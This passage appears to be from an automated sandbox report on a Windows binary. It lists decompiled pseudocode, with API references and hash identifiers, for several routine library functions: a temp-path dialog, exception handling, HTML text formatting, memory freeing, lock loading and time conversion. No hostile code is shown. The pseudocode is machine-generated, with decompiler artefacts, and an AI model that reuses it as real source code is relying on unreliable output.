                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x003ecf54
                0x00000000
                0x003ecf54
                0x003ecf56
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x003ed009
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c

                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 003ECE9D
                  • Part of subcall function 003DB690: _wcslen.LIBCMT ref: 003DB696
                • _swprintf.LIBCMT ref: 003ECED1
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(?,00000066,0041946A), ref: 003ECEF1
                • _wcschr.LIBVCRUNTIME ref: 003ECF22
                • EndDialog.USER32(?,00000001), ref: 003ECFFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                • String ID: %s%s%u
                • API String ID: 689974011-1360425832
                • Opcode ID: 924a08ee86de5057feb7d77b782ede8b2bdbbb4f6b32314916bd7fd126d3ad44
                • Instruction ID: c39da653bae204dc25d24506aaf1576abe7a1d37462105947c814c393ce2890d
                • Opcode Fuzzy Hash: 924a08ee86de5057feb7d77b782ede8b2bdbbb4f6b32314916bd7fd126d3ad44
                • Instruction Fuzzy Hash: 8C4193B19002A8AADF269B51DC45FEE77BCEB04301F4081A6F909E7181EF749E85CF65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E003F2900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00402567(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x40e7ac;
				E003F28C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x40e7ac);
				E003F396C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E003F3AF0(_t77, 0xfffffffe, _t96, 0x40e7ac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E003F3A90(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E003F28C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x4058dc;
											if(__eflags != 0) {
												_t72 = E00402090(__eflags, 0x4058dc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x4058dc; // 0x3f0150
													 *0x403278(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E003F3AD0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E003F3AF0(_t64, _t93, _t96, 0x40e7ac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E003F28C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E003F3AB0();
										asm("int3");
										__eflags = E003F3B07();
										if(__eflags != 0) {
											_t67 = E003F2B8C(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E003F3B43();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}





























                0x003f2900
                0x003f2907
                0x003f290b
                0x003f290c
                0x003f2912
                0x003f291e
                0x003f2920
                0x003f2926
                0x003f2926
                0x003f292f
                0x003f2931
                0x003f2934
                0x003f2937
                0x003f293f
                0x003f2944
                0x003f2947
                0x003f294a
                0x003f2951
                0x003f29ad
                0x003f29b0
                0x003f29b8
                0x003f29bf
                0x00000000
                0x003f29bf
                0x00000000
                0x003f2953
                0x003f2953
                0x003f2959
                0x003f295f
                0x003f2965
                0x003f29d0
                0x003f29d9
                0x003f2967
                0x003f2967
                0x003f2967
                0x003f296d
                0x003f2970
                0x003f2973
                0x003f2976
                0x003f2979
                0x003f297e
                0x003f2994
                0x00000000
                0x003f2980
                0x003f2980
                0x003f2982
                0x003f2987
                0x003f2989
                0x003f298c
                0x003f298e
                0x003f29a4
                0x003f29c4
                0x003f29c4
                0x003f29c8
                0x00000000
                0x003f2990
                0x003f2990
                0x003f29da
                0x003f29dd
                0x003f29e3
                0x003f29e5
                0x003f29ec
                0x003f29f3
                0x003f29f8
                0x003f29fb
                0x003f29fd
                0x003f29ff
                0x003f2a0c
                0x003f2a12
                0x003f2a14
                0x003f2a17
                0x003f2a17
                0x003f2a1a
                0x003f2a1a
                0x003f29ec
                0x003f2a20
                0x003f2a22
                0x003f2a27
                0x003f2a2a
                0x003f2a2d
                0x003f2a35
                0x003f2a39
                0x003f2a3e
                0x003f2a3e
                0x003f2a41
                0x003f2a45
                0x003f2a48
                0x003f2a55
                0x003f2a58
                0x003f2a5d
                0x003f2a63
                0x003f2a65
                0x003f2a6a
                0x003f2a6f
                0x003f2a71
                0x003f2a7c
                0x003f2a73
                0x003f2a73
                0x00000000
                0x003f2a73
                0x003f2a67
                0x003f2a67
                0x003f2a67
                0x003f2a69
                0x003f2a69
                0x003f2992
                0x00000000
                0x003f2992
                0x003f2990
                0x003f298e
                0x00000000
                0x003f2997
                0x003f2997
                0x003f2999
                0x003f29a0
                0x00000000
                0x003f29a2
                0x00000000
                0x003f29a0
                0x003f2965
                0x00000000

                APIs
                • _ValidateLocalCookies.LIBCMT ref: 003F2937
                • ___except_validate_context_record.LIBVCRUNTIME ref: 003F293F
                • _ValidateLocalCookies.LIBCMT ref: 003F29C8
                • __IsNonwritableInCurrentImage.LIBCMT ref: 003F29F3
                • _ValidateLocalCookies.LIBCMT ref: 003F2A48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 02e19b217a7b4c3a7fd8c48899a1f9ad8a06144e37bd1ab22d89de9f054969d5
                • Instruction ID: e47db521f1eb65ae4d150c7101cf2afe9745216cb04bea0e731a97234ea17606
                • Opcode Fuzzy Hash: 02e19b217a7b4c3a7fd8c48899a1f9ad8a06144e37bd1ab22d89de9f054969d5
                • Instruction Fuzzy Hash: AE41A434A0020CEFCF12DF69C885AAFBBA5EF44324F148065EA156B392D7759A21CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E003E9955(void* __edx, void* __eflags) {
				void* __ecx;
				signed int _t25;
				void* _t29;
				signed int _t30;
				intOrPtr _t31;
				void* _t35;
				signed int _t38;
				signed int _t45;
				void* _t51;
				signed short* _t52;
				void* _t53;
				signed short* _t55;
				signed short* _t57;
				signed short* _t58;
				void* _t59;
				void* _t60;

				_t57 =  *(_t59 + 0x10);
				_push(0x200 + E003F3E13(_t57) * 0xc);
				_t52 = E003F3E33(0x200 + E003F3E13(_t57) * 0xc);
				 *(_t59 + 0x10) = _t52;
				if(_t52 != 0) {
					E003F6066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t38 = E003F3E13(_t52);
					_t60 = _t59 + 0xc;
					_t25 =  *_t57 & 0x0000ffff;
					_t55 = _t57;
					if(_t25 == 0) {
						L19:
						_t52[_t38] = 0;
						L003F3E2E(_t57);
						return _t52;
					}
					_t45 = _t25;
					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
					_t29 = 0xd;
					_t51 = 0xa;
					do {
						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
							if(_t55 <= _t57) {
								L17:
								_t52[_t38] = _t45;
								_t38 = _t38 + 1;
								goto L18;
							}
							_t31 =  *((intOrPtr*)(_t60 + 0x14));
							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
								goto L17;
							} else {
								E003F6066( &(_t52[_t38]), L"&nbsp;");
								_t38 = _t38 + 6;
								goto L16;
							}
						} else {
							_t58 =  &(_t52[_t38]);
							_t53 = 0xa;
							while(_t55[3] == _t53) {
								E003F6066(_t58, L"<br>");
								_t55 =  &(_t55[2]);
								_t38 = _t38 + 4;
								_t35 = 0xd;
								_t58 =  &(_t58[4]);
								if(_t55[2] == _t35) {
									continue;
								}
								break;
							}
							_t52 =  *(_t60 + 0x10);
							_t55 =  &(_t55[1]);
							_t57 =  *(_t60 + 0x1c);
							L16:
							_t51 = 0xa;
						}
						L18:
						_t55 =  &(_t55[1]);
						_t30 =  *_t55 & 0x0000ffff;
						_t45 = _t30;
						_t29 = 0xd;
					} while (_t30 != 0);
					goto L19;
				}
				return _t57;
			}



















                0x003e9958
                0x003e996c
                0x003e9972
                0x003e9974
                0x003e997c
                0x003e998d
                0x003e9998
                0x003e999a
                0x003e999d
                0x003e99a1
                0x003e99a6
                0x003e9a4f
                0x003e9a52
                0x003e9a56
                0x00000000
                0x003e9a5f
                0x003e99ae
                0x003e99b0
                0x003e99b8
                0x003e99bb
                0x003e99bc
                0x003e99bf
                0x003e9a0d
                0x003e9a36
                0x003e9a36
                0x003e9a3a
                0x00000000
                0x003e9a3a
                0x003e9a0f
                0x003e9a16
                0x00000000
                0x003e9a1e
                0x003e9a27
                0x003e9a2e
                0x00000000
                0x003e9a2e
                0x003e99d3
                0x003e99d5
                0x003e99d8
                0x003e99d9
                0x003e99e5
                0x003e99ec
                0x003e99ef
                0x003e99f4
                0x003e99f5
                0x003e99fc
                0x00000000
                0x00000000
                0x00000000
                0x003e99fc
                0x003e99fe
                0x003e9a02
                0x003e9a05
                0x003e9a31
                0x003e9a33
                0x003e9a33
                0x003e9a3b
                0x003e9a3b
                0x003e9a40
                0x003e9a43
                0x003e9a48
                0x003e9a48
                0x00000000
                0x003e99bc
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                • API String ID: 176396367-3743748572
                • Opcode ID: d1884d1e9d53b9ef0360cf023ef0afccd8156fada07c427f20c23696f7f7d5db
                • Instruction ID: a88b8f447b3a42ac98bd378ef1497fcbc2fee84c5f39e225efb3565d5b3c0bb3
                • Opcode Fuzzy Hash: d1884d1e9d53b9ef0360cf023ef0afccd8156fada07c427f20c23696f7f7d5db
                • Instruction Fuzzy Hash: AC31AF7264439596DA32EB519C02B7BB3A4EF90320F61463FF9825B2C0FB65BD4083A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E003FC8A4(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E003FC868(_t45, 7);
					E003FC868(_t45 + 0x1c, 7);
					E003FC868(_t45 + 0x38, 0xc);
					E003FC868(_t45 + 0x68, 0xc);
					E003FC868(_t45 + 0x98, 2);
					E003F8DCC( *((intOrPtr*)(_t45 + 0xa0)));
					E003F8DCC( *((intOrPtr*)(_t45 + 0xa4)));
					E003F8DCC( *((intOrPtr*)(_t45 + 0xa8)));
					E003FC868(_t45 + 0xb4, 7);
					E003FC868(_t45 + 0xd0, 7);
					E003FC868(_t45 + 0xec, 0xc);
					E003FC868(_t45 + 0x11c, 0xc);
					E003FC868(_t45 + 0x14c, 2);
					E003F8DCC( *((intOrPtr*)(_t45 + 0x154)));
					E003F8DCC( *((intOrPtr*)(_t45 + 0x158)));
					E003F8DCC( *((intOrPtr*)(_t45 + 0x15c)));
					return E003F8DCC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                0x003fc8aa
                0x003fc8af
                0x003fc8b8
                0x003fc8c3
                0x003fc8ce
                0x003fc8d9
                0x003fc8e7
                0x003fc8f2
                0x003fc8fd
                0x003fc908
                0x003fc916
                0x003fc924
                0x003fc935
                0x003fc943
                0x003fc951
                0x003fc95c
                0x003fc967
                0x003fc972
                0x00000000
                0x003fc982
                0x003fc987

                APIs
                  • Part of subcall function 003FC868: _free.LIBCMT ref: 003FC891
                • _free.LIBCMT ref: 003FC8F2
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FC8FD
                • _free.LIBCMT ref: 003FC908
                • _free.LIBCMT ref: 003FC95C
                • _free.LIBCMT ref: 003FC967
                • _free.LIBCMT ref: 003FC972
                • _free.LIBCMT ref: 003FC97D
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                • Instruction ID: 11901795aaa6e0fe78ed33419b9acb88bb62861c6ae292df574b4f1619039f08
                • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                • Instruction Fuzzy Hash: E6114F715D0B0CAAE622B7B1CD07FEB7BACAF01B40F401C15F39D6E092DA65B9099750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 94%
                			E003EE5EE() {
				intOrPtr _t3;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t15;

				_t3 =  *0x431cd8;
				if(_t3 == 1) {
					L11:
					return 0;
				}
				if(_t3 != 0) {
					return 1;
				}
				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t15 != 0) {
					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
					if(_t7 == 0) {
						goto L3;
					}
					 *0x431cdc = _t7;
					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
					if(_t10 == 0) {
						goto L3;
					}
					 *0x431ce0 = _t10;
					L7:
					asm("lock cmpxchg [edx], ecx");
					if(0 != 0 || _t15 != 1) {
						return 0xbadbad;
					} else {
						goto L11;
					}
				}
				L3:
				_t15 = 1;
				goto L7;
			}







                0x003ee5ee
                0x003ee5fa
                0x003ee65f
                0x00000000
                0x003ee65f
                0x003ee5fe
                0x00000000
                0x003ee65b
                0x003ee60b
                0x003ee60f
                0x003ee61b
                0x003ee623
                0x00000000
                0x00000000
                0x003ee62b
                0x003ee630
                0x003ee638
                0x00000000
                0x00000000
                0x003ee63a
                0x003ee63f
                0x003ee648
                0x003ee64e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ee64e
                0x003ee611
                0x003ee611
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,003EE669,003EE5CC,003EE86D), ref: 003EE605
                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003EE61B
                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 003EE630
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 667068680-1718035505
                • Opcode ID: ee70e841fe5d0e33847a00fc140c6963b258ee323f9d4a6bdc55ad9ca04d919e
                • Instruction ID: fa7ea5bd8ed087dba5a57a9ce36532dc97758a854f3ea852e502fe0a86ff7b62
                • Opcode Fuzzy Hash: ee70e841fe5d0e33847a00fc140c6963b258ee323f9d4a6bdc55ad9ca04d919e
                • Instruction Fuzzy Hash: 89F08B313812F29B8F234F771C84A6722DCAA253463121B3AD905E31E0EB34CC046B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E003F8900(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x40ee90; // 0x2b62370
					if(_t7 != 0x40ec70) {
						E003F8DCC(_t7);
						 *0x40ee90 = 0x40ec70;
					}
				}
				E003F8DCC( *0x432280);
				 *0x432280 = 0;
				E003F8DCC( *0x432284);
				 *0x432284 = 0;
				E003F8DCC( *0x4326d0);
				 *0x4326d0 = 0;
				E003F8DCC( *0x4326d4);
				 *0x4326d4 = 0;
				return 1;
			}




                0x003f8909
                0x003f890d
                0x003f890f
                0x003f891b
                0x003f891e
                0x003f8924
                0x003f8924
                0x003f891b
                0x003f8930
                0x003f893d
                0x003f8943
                0x003f894e
                0x003f8954
                0x003f895f
                0x003f8965
                0x003f896d
                0x003f8976

                APIs
                • _free.LIBCMT ref: 003F891E
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003F8930
                • _free.LIBCMT ref: 003F8943
                • _free.LIBCMT ref: 003F8954
                • _free.LIBCMT ref: 003F8965
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: p@
                • API String ID: 776569668-1482256116
                • Opcode ID: b03e88f6c7eb9211aea8a99f85885c5a695e4bf20c4f69b326f249a601cb0d68
                • Instruction ID: 98c9ea24542aa5cb7a1be07e99841d7c47797b957c6c24fe0f59fb83426b9172
                • Opcode Fuzzy Hash: b03e88f6c7eb9211aea8a99f85885c5a695e4bf20c4f69b326f249a601cb0d68
                • Instruction Fuzzy Hash: 6EF0FE7181062A9BC74B6F14FE034263FB1FF257543012966F6146A2F1CBB54951DBC9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E003E146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				signed int _t56;
				signed int _t70;
				signed int _t72;
				signed int _t77;
				signed int _t85;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int* _t93;

				_t89 = _a4;
				_t93 = __ecx;
				_v48.wYear =  *_t89;
				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					_t90 = 0;
					_t77 = 0;
				} else {
					if(E003DB146() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, esi");
						asm("adc eax, esi");
						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, esi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t70 = _v72.dwHighDateTime.dwLowDateTime;
						_t85 = _v72.dwLowDateTime;
					}
					_t92 = 0x64;
					_t72 = _t85;
					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
					_t90 = _t72 * _t92;
				}
				 *_t93 = _t90;
				_a4 = _t77;
				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
				asm("adc ecx, ebx");
				 *_t93 = _t56;
				_a4 = 0;
				return _t56;
			}



















                0x003e1471
                0x003e1475
                0x003e147a
                0x003e1483
                0x003e148c
                0x003e1495
                0x003e149e
                0x003e14a7
                0x003e14ae
                0x003e14b3
                0x003e14ca
                0x003e156c
                0x003e156e
                0x003e14d0
                0x003e14da
                0x003e1500
                0x003e1513
                0x003e1523
                0x003e1533
                0x003e153f
                0x003e1545
                0x003e154d
                0x003e1553
                0x003e1555
                0x003e1559
                0x003e14dc
                0x003e14e6
                0x003e14ec
                0x003e14f0
                0x003e14f0
                0x003e155d
                0x003e1562
                0x003e1566
                0x003e1568
                0x003e1568
                0x003e1570
                0x003e1575
                0x003e157b
                0x003e157e
                0x003e1580
                0x003e1584
                0x003e158c

                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E14C2
                  • Part of subcall function 003DB146: GetVersionExW.KERNEL32(?), ref: 003DB16B
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E14E6
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003E1500
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 003E1513
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1523
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1533
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
